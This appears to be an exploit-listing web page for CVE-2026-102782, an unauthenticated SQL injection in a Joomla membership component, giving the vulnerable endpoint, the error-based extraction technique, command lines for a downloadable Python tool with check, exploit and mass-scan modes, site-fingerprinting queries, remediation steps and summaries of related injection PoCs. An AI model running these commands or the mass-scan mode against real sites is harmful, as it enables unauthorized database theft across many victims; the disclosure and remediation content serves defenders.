CVE-2026-102782 — OrdaSoft Joomla Simple Membership <7.4.0 Unauthenticated SQLi (checkLoginPass)
October 7, 2026 · 90 views
OrdaSoft Simple Membership (com_simplemembership) <7.4.0: task=checkLoginPass embeds unfiltered login param in SQL — unauthenticated error-based extractvalue leak (CWE-89). CVSS 4.0 9.3 Critical. Fixed 7.4.0+. Python PoC: check/exploit/mass -j, hits.txt & exploited.txt, optional --subquery. Marker POCBIT-102782-OK.
Description
Overview
CVE-2026-102782 — OrdaSoft Simple Membership (com_simplemembership) for Joomla — unauthenticated SQL injection on task=checkLoginPass via the login request parameter (CWE-89, CVSS 4.0 9.3 Critical).
| | |
|---|---|
| Affected | < 7.4.0 |
| Fixed | ≥ 7.4.0 |
| Endpoint | index.php?option=com_simplemembership&task=checkLoginPass&format=raw&login= |
| Verify marker | POCBIT-102782-OK (optional in --subquery) |
The handler passes login through Joomla’s generic input filter (HTML stripped; quotes/SQL not neutralized) and concatenates it into SQL. The PoC uses error-based extractvalue and reads ~leak~ from the response (often HTTP 500 error body).
Subdirectory installs: use the Joomla base path, e.g. https://example.com/simplemembership.
PoC page: https://pocbit.org/pocs/cve-2026-102782
GitHub: murrez/CVE-2026-102782
CVE.org: CVE-2026-102782
NVD: CVE-2026-102782
Bundled tool (Python 3)
Download cve-2026-102782.py — writes poc.py, requirements.txt, targets.example.txt.
python cve-2026-102782.py
pip install -r requirements.txt
python poc.py -u https://target.tld/simplemembership --mode check --aggressive
python poc.py -u https://target.tld --mode exploit
python poc.py -u https://target.tld --mode exploit --subquery "SELECT user()"
python poc.py --list targets.example.txt --mode check -j 25
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()"
Outputs: hits.txt, exploited.txt, cve_2026_102782_*.jsonl.
Discovery hints (your assets only)
body="com_simplemembership" && body="ordasoft"
body="task=checkLoginPass"
Remediation
- Upgrade Simple Membership to ≥ 7.4.0.
- Audit Joomla sites for com_simplemembership in extension lists.
- Review logs for checkLoginPass with malformed login values.
See Joomla security checklist (2026) and OrdaSoft CCK upload RCE (different OrdaSoft component).
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
- JoomlaCVE-2026-76570critical
CVE-2026-76570 — Joomla JCTables (com_jctables) Unauthenticated SQL Read/Write via JSON API
Joomcode JCTables 1.0.0–1.20.0: unauthenticated front-end JSON tasks (getdatarow, getrow) concatenate table/column names into SQL with broken escaping — arbitrary DB read/write (CWE-89/CWE-862). CVSS 4.0 10.0 Critical (AT:N). Fixed in 1.21.1+. Python PoC proves user row read (POCBIT-76570-OK); check + exploit + mass -j.
- JoomlaCVE-2026-100752high
CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.